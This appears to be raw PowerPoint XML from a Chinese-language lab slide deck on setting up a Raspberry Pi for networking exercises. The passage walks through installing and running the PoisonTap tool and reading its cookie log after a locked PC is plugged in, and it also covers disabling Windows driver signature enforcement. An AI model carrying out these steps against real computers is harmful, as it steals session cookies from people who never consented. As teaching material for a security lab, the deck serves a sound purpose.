          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> apt-get install git</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>git</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>檔案</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>git clone https://github.com/samyk/poisontap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>移動到資料夾</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>poisontap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1800" dirty="0"/>
              <a:t>背景執行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1800" dirty="0"/>
              <a:t>backend_server.js</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> node backend_server.js &amp;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>若是說已經使用可使用以下指令</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>lsof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> :1337 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t> kill -9 {PID}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408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C8C1F-C939-49D9-8FFF-5481D16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en-US" altLang="zh-TW" dirty="0"/>
              <a:t>WIN 10 RNDIS IP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FA6320-8E53-4814-ADBD-194B94E4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這邊要將電腦使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>DHCP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>開始</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>→設定→網路及網際網路→變更介面卡選項→</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>USB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Ethernet/RNDIS Gadget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>右鍵內容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IPv4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> →內容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>自動存取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>DHCP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455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04BF383-0E82-4756-8B84-14D8051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F6F92B-6E96-4357-9247-45F0008B4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Raspberry pi 4B</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>卡</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>USB Wi-Fi adapter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>TypeC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>typeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t> cable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2746678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6E70DD-C381-48B9-80E4-07847D06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D33703-6DE8-4F13-B83A-924F9940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將電腦上鎖</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>WIN+L</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>將電腦與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>連接</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>開啟一個</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>網站</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>例如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>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://211.22.104.114</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>可再次</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>去</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>log</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>poisontap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>cat poisontap.cookies.log</a:t>
            </a:r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檢核點：截圖</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>網站及</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>檔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5D4EF5-4A58-41ED-9D66-F3084D1A5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81" y="0"/>
            <a:ext cx="3312368" cy="33689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D7B4B09-851D-4247-8F31-5C0885478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81" y="3368920"/>
            <a:ext cx="3647728" cy="34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6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E912B0-6657-47E3-9FB3-FE71C2C3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8999B9-D854-41A1-B045-E012DC3C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2"/>
              </a:rPr>
              <a:t>https://www.ubuntu-tw.org/modules/newbb/viewtopic.php?topic_id=105922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3"/>
              </a:rPr>
              <a:t>https://blog.csdn.net/qq_28208251/article/details/48115815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4"/>
              </a:rPr>
              <a:t>https://www.86duino.com/?p=15623&amp;lang=TW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5"/>
              </a:rPr>
              <a:t>https://www.aircrack-ng.org/doku.php?id=airmon-ng#error_adding_monitor_mode_interfacecommand_failedoperation_not_supported_-95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6"/>
              </a:rPr>
              <a:t>https://github.com/samyk/poisontap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7"/>
              </a:rPr>
              <a:t>https://www.security-sleuth.com/sleuth-blog/2017/3/6/installing-poison-tap-for-dummies-the-most-complete-guide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>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://www.youtube.com/watch?v=dYDa_VDbjPY</a:t>
            </a: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1200" dirty="0"/>
              <a:t>802.11® Wireless Networks The Definitive Guide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95364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73CB1-8F4B-4ED6-8497-676E880D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實驗前應安裝軟體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EAD0D-0554-4097-AE4F-A9C1536F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SD card Formatter</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>BelenaEtcher</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>MobaXterm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>, Putty, 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07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E1DD65-CFB3-43E9-93FC-00CD8932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 err="1"/>
              <a:t>raspbian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E0582D-9BAC-4CFE-A93C-F5CBDA61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先用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SD card Formatter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>將</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>SD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>卡格式化</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>BelenaEtcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>燒錄指定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>https://www.raspberrypi.com/software/operating-systems/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>4-1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raspberry Pi OS (Legacy) with desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>4-2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Raspberry Pi OS with desktop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73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73CB1-8F4B-4ED6-8497-676E880D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Headless installation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1"/>
              <a:t>wifi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EAD0D-0554-4097-AE4F-A9C1536F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在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
              <a:t>/boot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>中</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>新增</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>空白檔</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>新增新的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>wpa_supplicant.conf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，建議以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>nodepad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>++</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>編輯</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>找到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>raspberry pi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>進入</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>預設帳號：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>pi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1600" dirty="0"/>
              <a:t>預設密碼：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>raspberry</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="1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77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DFD518-08A4-4DEF-B1C7-4F2A601B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wpa_supplicant.conf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183D88-E905-40B3-AA5E-EB9EE15F9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400" dirty="0" err="1"/>
              <a:t>ctrl_interface</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=DIR=/var/run/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>wpa_supplicant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t> GROUP=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>netdev</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>update_config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>country=TW</a:t>
            </a:r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en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>network={</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>ssid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YOUR SSID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0" err="1"/>
              <a:t>psk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>=“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>YOUR PASSWOED</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" dirty="0"/>
              <a:t>}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744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4BC2CE-4FF2-40F1-B7CD-87E04776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Windows 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>上安裝 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>USB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>虛擬網路卡驅動程式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46AB2-C415-48EF-83F0-4EE1E957B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Settings(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>設定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)→</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Update &amp; security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（更新與安全性）→</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Recovery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（復原）→</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Reboot(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>重新啟動</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t> →</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Troubleshoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（移難排解）→</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Advanced options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（進階選項）→</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Startup Settings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（啟動設定）→ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>Restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>（重新啟動）→</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>按下“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="2000" dirty="0"/>
              <a:t>F7″</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>，代表要停用驅動程式強制簽章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295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B8F6DD-64E7-425B-A6FF-93A7DC36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Windows 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0"/>
              <a:t>上安裝 </a:t>
            </a:r>
